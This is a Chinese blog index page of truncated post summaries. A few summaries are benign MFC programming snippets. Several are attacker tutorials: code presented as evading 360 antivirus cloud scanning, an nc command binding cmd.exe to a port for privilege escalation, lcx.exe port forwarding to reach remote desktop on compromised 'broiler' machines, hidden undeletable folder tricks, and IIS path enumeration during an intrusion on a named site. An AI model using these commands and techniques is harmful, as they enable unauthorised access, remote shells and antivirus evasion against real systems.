星星

摘要： 查了文件后，发现 client.php 被人修改过，时间也正是这一天。查了文件后，对比了下以前备份的文件。多了这样的代码原文件这一段正常的是这样的： function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') { $isuid = intval($isuid); $return = call_user_func(UC_API_FUNC, 'user', 'login', array( 阅读全文

摘要： 1、控件随窗口大小而自动缩放void CDVRDlg::OnSize(UINT nType, int cx, int cy) {RECT rcClient; if (GetDlgItem(IDC_STATIC_aa)) { GetClientRect(&rcClient); rcClient.left+=10; rcClient.right-=10; rcClient.top+=10; rcClient.bottom-=10; GetDlgItem(IDC_STATIC_aa)->MoveWindow(&rcClient); }}2、CButtonSTShort shBt 阅读全文

摘要： View Code 1 nCnt = m_serverlist.GetItemCount(); //获得当前在线的主机数量 2 nItem=m_serverlist.InsertItem(nCnt,(_bstr_t)ip,0); //nItem=新增加的记录,nItem值由自动排序生成,所以数值不会顺序生成 3 4 if(nCnt>1) //最后一项要大于1 5 { 6 --nCnt; 7 int i2=1; 8 //for(Tmpi=nItem;Tmpi<++nItem;Tmpi++ ) 9 //{//nItem值是随机的，主机上线会自动按IP地址对nItem进行排序10 //先 阅读全文

摘要： BOOL ProcessExit(LPCTSTR szProcName){ __asm NOP;__asm NOP;__asm NOP;__asm NOP;__asm NOP;__asm NOP;__asm NOP; PROCESSENTRY32 pe; DWORD dwRet; BOOL bFound = FALSE; HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSP) { pe.dwSize = sizeof( pe ); for (dwRet = Process32First(hSP, &p 阅读全文

摘要： 最近发现电脑速度明显变慢，杀毒又杀不出来，于是进入C盘，发现有一个很奇怪的文件夹，打不开也删不掉，于是便出现了下面的事：大家都知道在Windows中“\”符号是路径的分隔符号，比如“C:\Windows\”的意思就是C分区中的Windows文件夹，“C:\Windows\System.exe”的意思就是C分区中的Windows文件夹中的System.exe文件，好继续我们假设一下： 如果文件名中有“\”符号会怎么样呢？假如“S\”是一个文件夹的名字，这个文件夹位于：“F:\”，他的路径就是“F:\S\”，当我们试图访问的时候Windows会错误的认为我们要打开的文件是C分区的S文件夹，这样Wi 阅读全文

摘要： 【方案一】以点结尾的文件夹 代码:rem 创建以点结尾的文件夹md "C:\test"md "C:\test\batcher..\"代码:rem 把以点结尾的文件夹重命名为普通文件夹rem 短文件名可以使用dir/x命令获得ren "C:\test\BATCHE~1" "batcher"代码:rem 把普通文件夹重命名为以点结尾的文件夹ren "C:\test\batcher" "batcher../"代码:rem 打开以点结尾的文件夹start "" & 阅读全文

摘要： /*————————————————————————————————*///过360云查杀的代码void RaiseToDebugP(){HANDLE hToken;HANDLE hProcess = GetCurrentProcess();if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) ){ TOKEN_PRIVILEGES tkp; if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0]. 阅读全文

摘要： 环境说明： Server-U 不可利用 pcAnywhere没有安装提权思路: 上传NC，进行反弹连接。命令说明：nc -l -p 110 -t -e c:\winnt\system32\cmd.exe-l 监听本地入栈信息-p port 打开本地端口-t 以telnet形式应答入栈请求-e 程序重定向C:\RECYCLER\cmd.exeC:\RECYCLER\nc -l -p 110 -t -e c:\winnt\system32\cmd.exeC:\RECYCLER\nc -l -p 110 -t -e C:\RECYCLER\cmd.exe接下来留给我们的空间就比较充足了，我们可以添加 阅读全文

摘要： lcx.exe的使用方法以前抓肉鸡都是通过1433弱口令,然后..但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.用法:如在本机B上监听-listen513389，在肉鸡A上运行-slave本机ip51肉鸡ip3389那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。例:现在有一 阅读全文

摘要： 今晚在搞http://gov.com.im/的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice If IsN 阅读全文